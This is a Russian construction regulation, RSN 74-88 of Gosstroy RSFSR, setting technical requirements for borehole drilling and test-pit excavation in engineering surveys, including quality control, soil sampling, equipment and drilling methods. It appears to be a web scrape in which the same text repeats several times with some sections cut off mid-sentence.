РЕСПУБЛИКАНСКИЕ СТРОИТЕЛЬНЫЕ НОРМЫ
ИНЖЕНЕРНЫЕ ИЗЫСКАНИЯ ДЛЯ СТРОИТЕЛЬСТВА
ТЕХНИЧЕСКИЕ ТРЕБОВАНИЯ К ПРОИЗВОДСТВУ БУРОВЫХ И ГОРНОПРОХОДЧЕСКИХ РАБОТ
РСН 74-88
Госстрой РСФСР
ГОСУДАРСТВЕННЫЙ КОМИТЕТ РСФСР
ПО ДЕЛАМ СТРОИТЕЛЬСТВА
РАЗРАБОТАНЫ Научно-производственным объединением по инженерным изысканиям в строительстве (НПО «Стройизыскания») Госстроя РСФСР.
Исполнитель инж. В.А. Волковыский.
ВНЕСЕН НПО «Стройизыскания» Госстроя РСФСР.
ПОДГОТОВЛЕНЫ К УТВЕРЖДЕНИЮ Главным управлением организации проектирования и научно-исследовательских работ Госстроя РСФСР (исполнитель - инж. И.В. Родина).
Вводятся впервые.
Государственный комитет РСФСР по делам строительства (Госстрой РСФСР) |
Республиканские строительные нормы |
РСН 74-88 Госстрой РСФСР |
Инженерные изыскания для строительства. Технические требования к производству буровых и горнопроходческих работ. |
Вводятся впервые |
Настоящие Нормы устанавливают требования к производству буровых и горнопроходческих работ, выполняемых при инженерных изысканиях для жилищно-гражданского, промышленного и сельскохозяйственного строительства. Нормы являются обязательными для всех организаций, независимо от их ведомственной подчиненности, при проведении инженерных изысканий для указанных видов строительства на территории РСФСР.
Требования настоящих Норм не распространяются на производство буровых и горнопроходческих работ при инженерных изысканиях для гидротехнического, транспортного, мелиоративного и других специальных видов строительства.
1.1. Буровые и горнопроходческие работы следует выполнять в соответствии с требованиями СНиП 1.02.07-87, с учетом требований, изложенных в ГОСТ 20276-85, ГОСТ 23278-78, ГОСТ 23741-73, РСН 31-83, а также настоящих республиканских строительных норм.
Внесены НПО «Стройизыскания» |
Утверждены постановлением Государственного комитета
РСФСР по делам строительства |
Срок введения в действие |
1.2. Способы проходки горных выработок должны обеспечивать достоверную геологическую документацию и высокую производительность труда на конкретном объекте изысканий. Выбранный способ проходки горной выработки (скважины, шурфа (дудки) и т.п.) должен удовлетворять требованиям технологии отбора образцов грунта ненарушенной структуры (монолитов) и проб воды и возможности проведения комплекса работ в горной выработке, предусмотренных программой изысканий.
1.3. Проходка горных выработок должна осуществляться оборудованием, по техническим и экономическим параметрам соответствующим характеристикам горных выработок (глубине, диаметру, площади поперечного сечения, конструкции выработок), и условиям производства работ (транспортабельности).
1.4. При производстве горнобуровых работ должны осуществляться мероприятия по экономии материальных ресурсов, соблюдению правил эксплуатации, ремонта и профилактики бурового и горнопроходческого оборудования.
Нормирование расхода материалов и инструмента на производство буровых и горнопроходческих работ и списание материальных ценностей должно осуществляться в соответствии с требованиями РСН 71-88.
1.5. Сметная стоимость буровых и горнопроходческих работ определяется согласно Сборнику цен на изыскательские работы для капитального строительства. По согласованию с заказчиком могут устанавливаться надбавки за достижение конкретных результатов (эффективность, качество, а также сокращение сроков работ против нормативных).
1.6. При производстве буровых и горнопроходческих работ необходимо выполнять требования, предусмотренные действующими правилами и инструкциями по охране тру
РСН
74-88
ИНЖЕНЕРНЫЕ ИЗЫСКАНИЯ ДЛЯ СТРОИТЕЛЬСТВА.
ТЕХНИЧЕСКИЕ ТРЕБОВАНИЯ К ПРОИЗВОДСТВУ БУРОВЫХ
И ГОРНОПРОХОДЧЕСКИХ РАБОТ
Дата введения 1989-06-01
РАЗРАБОТАНЫ Научно-производственным объединением по инженерным изысканиям в строительстве (НПО «Стройизыскания») Госстроя РСФСР.
Исполнитель инж. В.А.
Волковыский.
ВНЕСЕНЫ НПО
«Стройизыскания» Госстроя РСФСР.
ПОДГОТОВЛЕНЫ К
УТВЕРЖДЕНИЮ Главным управлением организации проектирования и
научно-исследовательских работ Госстроя РСФСР (исполнитель — инж.
И.В. Родина).
УТВЕРЖДЕНЫ постановлением
Государственного комитета РСФСР по делам строительства от 26
декабря 1988 года № 109.
Вводятся впервые.
Настоящие Нормы устанавливают требования к производству буровых и горнопроходческих работ, выполняемых при инженерных изысканиях для жилищно-гражданского, промышленного и сельскохозяйственного строительства. Нормы являются обязательными для всех организаций, независимо от их ведомственной подчиненности, при проведении инженерных изысканий для указанных видов строительства на территории РСФСР.
Требования настоящих Норм не распространяются на производство буровых и горнопроходческих работ при инженерных изысканиях для гидротехнического, транспортного, мелиоративного и других специальных видов строительства.
1. ОБЩИЕ ПОЛОЖЕНИЯ
1.1. Буровые и
горнопроходческие работы следует выполнять в соответствии с
требованиями СНиП
1.02.07-87, с учетом требований, изложенных в ГОСТ
20276-85, ГОСТ
23278-78, ГОСТ 23741-73, РСН
31-83, а также настоящих республиканских строительных
норм.
1.2. Способы проходки
горных выработок должны обеспечивать достоверную геологическую
документацию и высокую производительность труда на конкретном
объекте изысканий. Выбранный способ проходки горной выработки
(скважины, шурфа (дудки) и т.п.) должен удовлетворять требованиям
технологии отбора образцов грунта ненарушенной структуры
(монолитов) и проб воды и возможности проведения комплекса работ в
горной выработке, предусмотренных программой изысканий.
1.3. Проходка горных
выработок должна осуществляться оборудованием, по техническим и
экономическим параметрам соответствующим характеристикам горных
выработок (глубине, диаметру, площади поперечного сечения,
конструкции выработок) и условиям производства работ
(транспортабельности).
1.4. При производстве горнобуровых работ должны осуществляться мероприятия по экономии материальных ресурсов, соблюдению правил эксплуатации, ремонта и профилактики бурового и горнопроходческого оборудования.
Нормирование расхода
материалов и инструмента на производство буровых и
горнопроходческих работ и списание материальных ценностей должно
осуществляться в соответствии с требованиями РСН
71-88.
1.5. Сметная стоимость
буровых и горнопроходческих работ определяется согласно Сборнику
цен на изыскательские работы для капитального строительства. По
согласованию с заказчиком могут устанавливаться надбавки за
достижение конкретных результатов (эффективность, качество, а также
сокращение сроков работ против нормативных).
1.6. При производстве
буровых и горнопроходческих работ необходимо выполнять требования,
предусмотренные действующими правилами и инструкциями по охране
труда и технике безопасности.
2. ОРГАНИЗАЦИЯ БУРОВЫХ И ГОРНОПРОХОДЧЕСКИХ РАБОТ
2.1. Буровые и
горнопроходческие работы выполняются в соответствии с программой
(при малых объемах — предписанием) изысканий. В программе работ
приводятся состав, технология, объемы буровых и горнопроходческих
работ (количество и места расположения горных выработок, их
глубина, конструкция, способы проходки, опробования и ликвидации) и
требования к технической документации.
2.2. На выполнение
буровых и горнопроходческих работ руководителю работ (начальнику
партии, отряда) выдается выписка из программы или копия программы
(предписания), где указываются количество, глубина и сечение
(диаметр) горных выработок, их конструкция, технологические режимы
проходки, особые требования к технологии проведения и документации
и сроки выполнения работ.
Перед началом буровых и
горнопроходческих работ руководитель совместно с геодезистом должен
осмотреть участок работ, уточнить места расположения и привести
схему расположения горных выработок в журнале полевой документации
с кратким описанием площадки.
Перенесение в натуру
проекта размещения горных выработок должно производиться до начала
проведения горнобуровых работ в соответствии с действующими
нормативными документами для инженерно-геодезических работ.
Планово-высотная привязка выработок выполняется после окончания ликвидационных работ. Для обеспечения привязки каждая горная выработка должна закрепляться репером. В населенных пунктах, на проезжих частях дорог, железнодорожных насыпях и в других местах, где невозможна установка репера или обеспечение его сохранности, привязка должна осуществляться сразу после окончания проходки.
Руководителем буровых (горнопроходческих) работ для непосредственных исполнителей (бурильщиков, проходчиков) составляется календарный график и наряд-задание на проходку горных выработок на объекте, а для горных выработок, проходимых на значительную глубину или в сложных геологических условиях, — геотехнический наряд, который выдается исполнителям перед началом производства полевых работ на объекте.
2.3. Контроль качества
буровых и горнопроходческих работ осуществляется проведением
входного, операционного выборочного и приемочного видов
контроля.
Входному контролю
подвергается оборудование и инструмент для проведения буровых и
горнопроходческих работ, проверяется соответствие технических
характеристик оборудования и инструмента технологии производства
работ путем технического осмотра (внешний вид, комплектность и
маркировка).
Входной контроль
осуществляется руководителем и непосредственными исполнителями
работ.
Операционному контролю
подвергается весь технологический процесс бурения или
горнопроходческих работ, соответствие заданию количества и качества
отбора образцов грунта, ведение технической документации в
соответствии с требованиями нормативных документов. Контроль
осуществляется непосредственным исполнителем (бурильщиком,
проходчиком), фиксация результатов операционного контроля в полевой
документации производится в случаях, предусмотренных технологией
проведения горных выработок в программе работ.
Операционный выборочный
контроль должны осуществлять руководитель работ или работник,
проводящий полевой контроль выполнения буровых и горнопроходческих
работ, в процессе которого должны проверяться: соблюдение
технологической дисциплины, в том числе требований государственных
стандартов, нормативов, методологических документов, программы
(задания, предписания), а также правил и инструкций по эксплуатации
оборудования, правил техники безопасности и охраны труда;
соблюдение трудовой дисциплины и внутреннего распорядка, культуры
производства; внедрение передовых методов труда; обеспеченность
необходимым оборудованием, инструментом и средствами измерений.
Результаты операционного выборочного контроля фиксируются в
журналах первичной полевой документации (буровых, проходки горных
выработок и т.п.).
Приемочный контроль
результатов буровых и горнопроходческих работ, передаваемых полевым
подразделением в камеральную группу, должен осуществлять главный
геолог структурного подразделения и руководитель камеральной группы
при участии руководителя полевого подразделения. Приемку
результатов буровых и горнопроходческих работ допускается проводить
по частям, по мере завершения работ на отдельных участках.
Приемочный контроль
должен быть сплошным, объемы буровых и горнопроходческих работ
должны соответствовать программе работ, а состав — требованиям
нормативных документов.
Результаты приемочного
контроля оформляются актом приемочного контроля результатов полевых
инженерно-геологических работ.
2.4. Нормирование буровых
и горнопроходческих работ производится в соответствии с Едиными
нормами времени и расценками на изыскательские работы, часть II
«Инженерно-геологические изыскания», М., 1983.
2.5. Проходка горноразведочных выработок осуществляется в различных природных и геологических условиях, оказывающих существенное влияние на выбор технических средств и технологических режимов бурения и горнопроходческих работ.
Буровые установки,
инструмент и режимные параметры бурения должны соответствовать
физико-механическим свойствам грунтов. Режимные параметры (скорость
вращения, нагрузка на забой, высота сбрасывания инструмента и т.д.)
подбираются опытным путем в зависимости от состава, состояния и
свойств проходимых грунтов.
Одним из основных видов
горнопроходческих работ при производстве инженерно-геологических
изысканий в строительстве, обеспечивающих получение наиболее полных
данных о грунтах, является проходка шурфов (дудок). Проходка шурфов
бурением осуществляется в нескальных грунтах.
Бурение шурфов (дудок)
должно обеспечивать возможность описания геологического разреза,
отбора образцов грунта, в том числе ненарушенной структуры, и
проведения полевых опытных исследований, предусмотренных программой
работ.
Кроме того, при
производстве инженерно-строительных изысканий проводятся следующие
горные выработки: закопушки, расчистки, канавы, шурфы, шахты и
штольни. Условия их применения регламентируются приложением 2
СНиП
1.02.07-87.
2.6. Отбор проб грунта,
упаковка, транспортирование и хранение должны осуществляться в
соответствии с ГОСТ
12071-84. Для визуального описания должен использоваться весь
грунт, извлеченный из горной выработки.
При визуальном описании
нескальных грунтов должны отбираться представительные образцы для
контрольного описания, которые укладываются в ящики, разделенные
перегородками на ячейки. Каждый образец снабжается этикеткой,
указывающей номер договора, название объекта, номер выработки,
интервал отбора, дату, фамилию геолога.
При бурении скальных
пород весь керн укладывается в ящики, керн каждого рейса отделяют
от последующего деревянной биркой или этикеткой, завернутой
водозащитной пленкой или восковкой, в которой указывают номер
скважины, интервал глубин рейса, дату, фамилию геолога.
При проходке
горноразведочных выработок (шурфов, дудок и т.д.) описание забоя
следует производить периодически, по мере продвижения забоя.
Описываемый участок не должен превышать 2 м по глубине
выработки.
2.7. После окончания
изыскательских работ на объекте (площадке) все горные выработки
должны быть ликвидированы, а на месте проходки горных выработок
восстановлены естественные условия. Способ ликвидационного
тампонажа должен быть указан в программе, а в непредвиденных
случаях — назначен руководителем работ. На ликвидацию горных
выработок составляется акт (приложение 2). Акт прилагается к
первому экземпляру технического отчета об инженерно-строительных
изысканиях.
3. ОБОРУДОВАНИЕ ДЛЯ ПРОВЕДЕНИЯ ГОРНЫХ ВЫРАБОТОК
3.1. Основными
техническими средствами для производства буровых и
горнопроходческих работ (бурения шурфов) являются выпускаемые
промышленностью буровые установки (станки), а также находящиеся в
эксплуатации изыскательских организаций установки (станки),
выпускавшиеся ранее, по своим техническим параметрам
удовлетворяющие требованиям технологии проведения горных выработок
инженерно-геологического назначения.
3.2. Сложность доставки и
транспортировки бурового оборудования определяют транспортную базу
и конструктивные особенности буровых установок (станков).
Характеристики различных
условий производства буровых работ и типы буровых установок
(станков) по транспортабельности приведены в таблице.
4. ТРЕБОВАНИЯ К СПОСОБАМ БУРЕНИЯ И ТЕХНОЛОГИИ ПРОХОДКИ ИНЖЕНЕРНО-ГЕОЛОГИЧЕСКИХ СКВАЖИН
4.1. Выбор способа
бурения определяется типом проходимых грунтов, характером
геологического разреза и требованиями программы работ.
4.2. При изысканиях под
сооружения I-II классов должны применяться наиболее информативные
способы бурения. Для проходки разведочных и технических
инженерно-геологических скважин следует применять способ бурения,
дающий образцы грунта в виде столбика (керна). Наиболее
информативным способом бурения в крепких и твердых грунтах является
колонковый с промывкой и продувкой, в грунтах средней твердости и
мягких — вибрационный, колонковый «всухую» и ударно-канатный
(забивной и клюющий) кольцевым забоем. Достаточно информационными в
соответствующих условиях являются способы бурения: пневмоударный,
шнековый — кольцевым забоем и вдавливаемый. Для проходки грунтов,
неустойчивых в стенках скважин, допускается применение
ударно-канатного способа с одновременной или опережающей обсадкой
трубами.
4.3. Конечный диаметр
бурения разведочных скважин в нескальных талых грунтах должен быть
не менее 108 мм, в мерзлых — 127 мм. Минимальный диаметр бурения
технических скважин определяется максимальным диаметром грунтоноса
для отбора монолитов грунта, выбираемого в соответствии с ГОСТ
12071-84. Конечный диаметр бурения разведочных скважин в
выветрелых скальных грунтах должен быть не менее 112 мм, в
слабовыветрелых и невыветрелых — 59-76 мм. В крупнообломочных
грунтах (талых и мерзлых), — 168 мм.
Характеристики различных условий производства буровых работ и типы буровых установок по транспортабельности
| Краткое
описание природных, климатических и экономических особенностей
района работ |
| Типы рекомендуемых буровых установок по транспортабельности |
1 | 2 | 3 | 4 |
Легкие | Равнинные, почти безлесные
районы, слабопересеченная местность, городские и сельские районы с
густой дорожной сетью, умеренный климат | Возможен подъезд автотранспортом любой проходимости | Самоходные на базе автомобиля и перевозимые установки (станки) |
Средние | Местность пересеченная,
небольшие лесные массивы и кустарники, большая удаленность от
автомобильных и железных дорог и населенных пунктов, суровый резко
континентальный климат | Возможен подъезд автотранспортом с высокой проходимостью при устройстве временных подъездных дорог или транспортом на гусеничном ходу | Самоходные на базе трактора, перевозимые стационарные и переносные станки и установки |
Тяжелые | Таежные и горные районы Крайнего Севера, отдаленные области при сильно- пересеченной местности и суровом климате | Подъезд обычными видами
транспорта практически невозможен. Местность доступна вертолетам,
аэросаням и т.п., а также вьючному транспорту и пешеходам | Переносные станки, стационарные станки, разбирающиеся на отдельные транспортабельные блоки массой не более 120 кг |
Особые | Акватории портов, шельфовые
зоны морей и океанов, русла рек, сильнозаболоченные районы,
подземные горные выработки, места с воздействием высоких и низких
температур, давлений и т.п. | Необходимо использовать особые
виды транспорта (плавучие средства, подъемники, барокамеры и т.п.).
Пешеходам район | Стационарные, самоходные станки (установки) специальной конструкции, либо станки, имеющие специальную комплектацию |
4.4 Не допускается
бурение колонковым способом с промывкой в грунтах лёссовых
(просадочных), засоленных, легко- и среднерастворимых, сильно- и
средненабухающих, мерзлых (кроме скальных).
4.5. Ограничением рейса
при бурении является искусственное прекращение процесса бурения,
вызванное необходимостью более точного определения разреза,
выделения слоев, прослоек и включений, сохранением керна,
повышением выхода керна. Ограничение рейса при бурении должно быть
оговорено в программе работ (предписании).
4.6. Способы бурения —
шнековый, поточный и рейсовый и медленно-вращательный допускается
применять:
для проходки разведочных
скважин — в разрезах, представленных однородными и незакономерно
изменяющимися песками при изысканиях под сооружения III класса;
для проходки специальных
скважин в непосредственной близости от пройденных ранее разведочных
скважин;
для отбора проб грунтов
на определение коррозионной активности лабораторными методами;
для проходки верхнего
сезонно-мерзлого слоя грунта при забурке скважин.
Во всех случаях
применение указанных способов бурения должно быть обосновано в
программе изысканий.
4.7. Режимы бурения
инженерно-геологических скважин разрабатываются применительно к
конкретным геологическим условиям на объекте изысканий в
соответствии с требованиями, предъявляемыми программой производства
изысканий к качеству инженерно-геологической документации.
4.8. В районах развития
карста в качестве основного способа бурения следует принимать
колонковый — буровыми установками со свободной подачей инструмента.
Бурение следует производить с тщательным хронометражем, фиксируя
механическую скорость, провалы инструмента с точным указанием
интервалов, баланс расхода и характер циркуляции промывочной
жидкости или воздуха при бурении с промывкой и продувкой.
5. ТРЕБОВАНИЯ К ПРОХОДКЕ ШУРФОВ БУРЕНИЕМ
5.1. Бурение шурфов
буровыми установками должно осуществляться с горизонтально ровного
участка, очищенного от строительного мусора, кустарника и
посторонних предметов. На крутых косогорах следует создавать выемки
в виде уступа или траншеи.
5.2. При подготовке
рабочей площадки необходимо учитывать значительный объем
извлекаемого грунта, количество которого определяется расчетом, для
обустройства отвалов грунта. Рекомендуемыми типами отвалов породы
при бурении шурфов являются полукольцевые ленточные и
веерообразные, полукольцевые отвалы целесообразны при
незначительной глубине выработок.
Ленточные и веерообразные
отвалы обустраиваются, когда отсыпка породы в полукольцевой
невозможна (на косогорах, когда размер площадки невелик и
т.п.).
5.3. Бурение шурфов
производится вращательным, ударно-канатным и комбинированным
способами.
Способ и диаметр бурения
шурфов-скважин следует выбирать в зависимости от видов и свойств
проходимых грунтов, назначения и глубины шурфов.
Вращательный способ
наиболее целесообразно применять при проходке шурфов диаметром
600-1300 мм, глубиной до 6 м. При вращательном способе бурение
должно осуществляться без промывки и подлива воды. Углубка на один
рейс устанавливается в пределах 0,2-0,5 м.
Ударно-канатный способ
целесообразно применять при проходке шурфов диаметром 600-900 мм на
глубину до 10 м в глинистых грунтах, лёссах и лёссовидных
грунтах.
Применение ударного
способа бурения шурфов в грунтах с неустойчивыми стенками не
допускается.
Для проходки шурфов
глубиной более 10 м наиболее рациональным является комбинированный
способ бурения. Начальный интервал шурфа до глубины 3-4 м
проходится вращательным способом. Диаметр бура для вращательного
бурения должен быть на 150-200 мм больше диаметра наконечника для
ударного бурения, которым производится дальнейшая проходка до
проектной глубины.
При вращательном бурении
шурфов частота вращения снаряда не должна превышать 80 об/мин.
Высота сбрасывания инструмента при ударном бурении не должна
превышать 6 м. Максимальный диаметр наконечника ударного бурения
шурфов — 900 мм.
5.4. При проходке шурфов бурением, когда предполагается их использование в течение достаточно длительного времени, а также при проходке шурфов в неустойчивых породах они должны быть
РЕСПУБЛИКАНСКИЕ СТРОИТЕЛЬНЫЕ НОРМЫ
ИНЖЕНЕРНЫЕ ИЗЫСКАНИЯ ДЛЯ СТРОИТЕЛЬСТВА
ТЕХНИЧЕСКИЕ ТРЕБОВАНИЯ К ПРОИЗВОДСТВУ БУРОВЫХ
И ГОРНОПРОХОДЧЕСКИХ РАБОТ
РСН 74-88
Госстрой РСФСР
ГОСУДАРСТВЕННЫЙ КОМИТЕТ РСФСР
ПО ДЕЛАМ СТРОИТЕЛЬСТВА
РАЗРАБОТАНЫ Научно-производственным объединением по инженерным изысканиям в строительстве (НПО «Стройизыскания») Госстроя РСФСР.
Исполнитель инж. В.А. Волковыский.
ВНЕСЕН НПО «Стройизыскания» Госстроя РСФСР.
ПОДГОТОВЛЕНЫ К УТВЕРЖДЕНИЮ Главным управлением организации проектирования и научно-исследовательских работ Госстроя РСФСР (исполнитель - инж. И.В. Родина).
Вводятся впервые.
Государственный |
Республиканские строительные нормы |
РСН 74-88 Госстрой РСФСР |
Инженерные изыскания для строительства. Технические требования к производству буровых и горнопроходческих работ. |
Вводятся впервые |
Настоящие Нормы устанавливают требования к производству буровых и горнопроходческих работ, выполняемых при инженерных изысканиях для жилищно-гражданского, промышленного и сельскохозяйственного строительства. Нормы являются обязательными для всех организаций, независимо от их ведомственной подчиненности, при проведении инженерных изысканий для указанных видов строительства на территории РСФСР.
Требования настоящих Норм не распространяются на производство буровых и горнопроходческих работ при инженерных изысканиях для гидротехнического, транспортного, мелиоративного и других специальных видов строительства.
1.1. Буровые и горнопроходческие работы следует выполнять в соответствии с требованиями СНиП 1.02.07-87, с учетом требований, изложенных в ГОСТ 20276-85, ГОСТ 23278-78, ГОСТ 23741-73, РСН 31-83, а также настоящих республиканских строительных норм.
Внесены НПО «Стройизыскания» Госстроя РСФСР |
Утверждены постановлением Государственного комитета РСФСР по делам строительства от 26 декабря 1988 г. № 109 |
Срок введения в действие 1 июня 1989 г. |
1.2 Способы проходки горных выработок должны обеспечивать достоверную геологическую документацию и высокую производительность труда на конкретном объекте изысканий. Выбранный способ проходки горной выработки (скважины, шурфа (дудки) и т.п.) должен удовлетворять требованиям технологии отбора образцов грунта ненарушенной структуры (монолитов) и проб воды и возможности проведения комплекса работ в горной выработке, предусмотренных программой изысканий.
1.3 Проходка горных выработок должна осуществляться оборудованием, по техническим и экономическим параметрам, соответствующим характеристикам горных выработок (глубине, диаметру, площади поперечного сечения, конструкции выработок), и условиям производства работ (транспортабельности).
1.4 При производстве горнобуровых работ должны осуществляться мероприятия по экономии материальных ресурсов, соблюдению правил эксплуатации, ремонта и профилактики бурового и горнопроходческого оборудования.
Нормирование расхода материалов и инструмента на производство буровых и горнопроходческих работ и списание материальных ценностей должно осуществляться в соответствии с требованиями РСН 71-88.
1.5 Сметная стоимость буровых и горнопроходческих работ определяется согласно Сборнику цен на изыскательские работы для капитального строительства. По согласованию с заказчиком могут устанавливаться надбавки за достижение конкретных результатов (эффективность, качество, а также сокращение сроков работ против нормативных).
1.6 При производстве буровых и горнопроходческих работ необходимо выполнять требования, предусмотренные действующими правилами и инструкциями по охране труда и технике безопасности.
2.1 Буровые и горнопроходческие работы выполняются в соответствии с программой (при малых объемах — предписанием) изысканий. В программе работ приводится состав, технология, объемы буровых и горнопроходческих работ (количество и места расположения горных выработок, их глубина, конструкция, способы проходки, опробования и ликвидация) и требования к технической документации.
2.2 На выполнение буровых и горнопроходческих работ руководителю работ (начальнику партии, отряда) выдается выписка из программы или копия программы (предписания), где указываются количество, глубина и сечение (диаметр) горных выработок, их конструкция, технологические режимы проходки, особые требования к технологии проведения и документации и сроки выполнения работ.
Перед началом буровых и горнопроходческих работ руководитель совместно с геодезистом должен осмотреть участок работ, уточнить места расположения и привести схему расположения горных выработок в журнале полевой документации с кратким описанием площадки.
Перенесение в натуру проекта размещения горных выработок должно производиться до начала проведения горнобуровых работ в соответствии с действующими нормативными документами для инженерно-геодезических работ.
Планово-высотная привязка выработок выполняется после окончания ликвидационных работ. Для обеспечения привязки каждая горная выработка должна закрепляться репером. В населенных пунктах, на проезжих частях дорог, железнодорожных насыпях и в других местах, где невозможна установка репера или обеспечение его сохранности, привязка должна осуществляться сразу после окончания проходки.
Руководителем буровых (горнопроходческих) работ для непосредственных исполнителей (бурильщиков, проходчиков) составляется календарный график и наряд-задание на проходку горных выработок на объекте, а для горных выработок, проходимых на значительную глубину или в сложных геологических условиях, — геотехнический наряд, который выдается исполнителем перед началом производства полевых работ на объекте.
2.3. Контроль качества буровых и горнопроходческих работ осуществляется проведением входного, операционного выборочного и приемного видов контроля.
Входному контролю подвергается оборудование и инструмент для проведения буровых и горнопроходческих работ, проверяется соответствие технических характеристик оборудования и инструмента технологии производства работ путем технического осмотра (внешний вид, комплектность и маркировка).
Входной контроль осуществляется руководителем и непосредственными исполнителями работ.
Операционному контролю подвергается весь технологический процесс бурения или горнопроходческих работ, соответствие заданию количества отбора образцов грунта, ведение технической документации в соответствии с требованиями нормативных документов. Контроль осуществляется непосредственными исполнителями (бурильщиком, проходчиком), фиксация результатов операционного контроля в полевой документации производится в случаях, предусмотренных технологией проведения горных выработок в программе работ.
Операционный выборочный контроль должны осуществлять руководитель работ или работник, проводящий полевой контроль выполнения буровых и горнопроходческих работ, в процессе которого должны проверяться: соблюдение технологической дисциплины, в том числе требований государственных стандартов, нормативов, методологических документов, программы (задания, предписания), а также правил и инструкций по эксплуатации оборудования, правил техники безопасности и охраны труда; соблюдение трудовой дисциплины и внутреннего распорядка, культуры производства; внедрение передовых методов труда; обеспеченность необходимым оборудованием, инструментом и средствами измерений. Результаты операционного выборочного контроля фиксируются в журналах первичной полевой документации (буровых, проходки горных выработок и т.п.).
Приемочный контроль результатов буровых и горнопроходческих работ, передаваемых полевым подразделением в камеральную группу, должен осуществлять главный геолог структурного подразделения и руководитель камеральной группы при участии руководителя полевого подразделения. Приемку результатов буровых и горнопроходческих работ допускается проводить по частям, по мере завершения работ на отдельных участках.
Приемочный контроль должен быть сплошным, объемы буровых и горнопроходческих работ должны соответствовать программе работ, а состав — требованиям нормативных документов.
Результаты приемочного контроля оформляются актом приемочного контроля результатов полевых инженерно-геологических работ.
2.4 Нормирование буровых и горнопроходческих работ производится в соответствии с Едиными нормами времени и расценками на изыскательские работы, часть II «Инженерно-геологические изыскания», М., 1983.
2.5 Проходка горноразведочных выработок осуществляется в различных природных и геологических условиях, оказывающих существенное влияние на выбор технических средств и технологических режимов бурения и горнопроходческих работ.
Буровые установки, инструмент и режимные параметры бурения должны соответствовать физико-механическим свойствам грунтов. Режимные параметры (скорость вращения, нагрузка на забой, высота сбрасывания инструмента и т.д.) подбираются опытным путем в зависимости от состава, состояния и свойств проходимых грунтов.
Одним из основных видов горнопроходческих работ при производстве инженерно-геологических изысканий в строительстве, обеспечивающих получение наиболее полных данных о грунтах, является проходка шурфов (дудок). Проходка шурфов бурением осуществляется в нескальных грунтах.
Бурение шурфов (дудок) должно обеспечивать возможность описания геологического разреза, отбора образцов грунта, в том числе ненарушенной структуры, и проведения полевых опытных исследований, предусмотренных программой работ.
Кроме того, при производстве инженерно-строительных изысканий проводятся следующие горные выработки: закопушки, расчистки, канавы, шурфы, шахты и штольни. Условия их применения регламентируются приложением 2 СНиП 1.02.07-87.
2.6. Отбор проб грунта, упаковка, транспортирование и хранение должны осуществляться в соответствии с ГОСТ 12071-84. Для визуального описания должен использоваться весь грунт, извлеченный из горной выработки.
При визуальном описании нескальных грунтов должны отбираться представительные образцы для контрольного описания, которые укладываются в ящики, разделенные перегородками на ячейки. Каждый образец снабжается этикеткой, указывающей номер договора, название объекта, номер выработки, интервал отбора, дату, фамилию геолога.
При бурении скальных пород весь керн укладывается в ящики, керн каждого рейса отделяют от последующего деревянной биркой или этикеткой, завернутой водозащитной пленкой или восковкой, в которой указывают номер скважины, интервал глубин рейса, дату, фамилию геолога.
При проходке горноразведочных выработок (шурфов, дудок и т.д.) описание забоя следует производить периодически, по мере продвижения забоя. Описываемый участок не должен превышать 2 м по глубине выработки.
2.7. После окончания изыскательских работ на объекте (площадке) все горные выработки должны быть ликвидированы, а на месте проходки горных выработок восстановлены естественные условия. Способ ликвидационного тампонажа должен быть указан в программе, а в непредвиденных случаях — назначен руководителем работ. На ликвидацию горных выработок составляется акт (приложение 2). Акт прилагается к первому экземпляру технического отчета об инженерно-строительных изысканиях.
3.1. Основными техническими средствами для производства буровых и горнопроходческих работ (бурения шурфов) являются выпускаемые промышленностью буровые установки (станки), а также находящиеся в эксплуатации изыскательских организаций установки (станки), выпускавшиеся ранее, по своим техническим параметрам удовлетворяющие требованиям технологии проведения горных выработок инженерно-геологического назначения.
3.2. Сложность доставки и транспортировки бурового оборудования определяют транспортную базу и конструктивные особенности буровых установок (станков).
Характеристики различных условий производства буровых работ и типы буровых установок (станков) по транспортабельности приведены в таблице.
4.1. Выбор способа бурения определяется типом проходимых грунтов, характером геологического разреза и требованиями программы работ.
4.2. При изысканиях под сооружения I-II классов должны применяться наиболее информативные способы бурения. Для проходки разведочных и технических инженерно-геологических скважин следует применять способ бурения, дающий образцы грунта в виде столбика (керна). Наиболее информативным способом бурения в крепких и твердых грунтах является колонковый с промывкой и продувкой, в грунтах средней твердости и мягких — вибрационный, колонковый «всухую» и ударно-канатный (забивной и клюющий) кольцевым забоем. Достаточно информационными в соответствующих условиях являются способы бурения: пневмоударный, шнековый — кольцевым забоем и вдавливаемый. Для проходки грунтов, неустойчивых в стенках скважин, допускается применение ударно-канатного способа с одновременной или опережающей обсадкой трубами.
4.3. Конечный диаметр бурения разведочных скважин в нескальных талых грунтах должен быть не менее 108 мм, в мерзлых — 127 мм. Минимальный диаметр бурения технических скважин определяется максимальным диаметром грунтоноса для отбора монолитов грунта, выбираемого в соответствии с ГОСТ 12071-84. Конечный диаметр бурения разведочных скважин в выветрелых скальных грунтах должен быть не менее 112 мм, в слабовыветрелых и невыветрелых — 59-76 мм. В крупнообломочных грунтах (талых и мерзлых), — 168 мм.
Характеристики различных условий производства буровых работ и типы буровых установок по транспортабельности
Условия работ |
Краткое описание природных, климатических и экономических особенностей района работ |
Условия проезда транспортом |
Типы рекомендуемых буровых установок по транспортабельности |
1 |
2 |
3 |
4 |
Легкие |
Равнинные, почти безлесные районы, слабо пересеченная местность, городские и сельские районы с густой дорожной сетью, умеренный климат |
Возможен подъезд автотранспортом любой проходимости |
Самоходные на базе автомобиля и перевозимые установки (станки) |
Средние |
Местность пересеченная, небольшие лесные массивы и кустарники, большая удаленность от автомобильных и железных дорог и населенных пунктов, суровый резко континентальный климат |
Возможен подъезд автотранспортом с высокой проходимостью при устройстве временных подъездных дорог или транспортом на гусеничном ходу |
Самоходные на базе трактора, перевозимые стационарные и переносные станки и установки |
Тяжелые |
Таежные и горные районы Крайнего Севера, отдаленные области при сильно пересеченной местности и суровом климате |
Подъезд обычными видами транспорта практически невозможен. Местность доступна вертолетам, аэросаням и т.п., а также вьючному транспорту и пешеходам |
Переносные станки, стационарные станки, разбирающиеся на отдельные транспортабельные блоки массой не более 120 кг |
Особые |
Акватории портов, шельфовые зоны морей и океанов, русла рек, сильно заболоченные районы, подземные горный выработки, места с воздействием высоких и низких температур, давлений и т.п. |
Необходимо использовать особые виды транспорта (плавучие средства, подъемники и т.п.). Пешеходам район не доступен |
Стационарные, самоходные станки (установки) специальной конструкции, либо станки, имеющие специальную комплектацию |
4.4 Не допускается бурение колонковым способом с промывкой в грунтах лессовых (просадочных), засоленных, легко и среднерастворимых, сильно- и средненабухающих, мерзлых (кроме скальных).
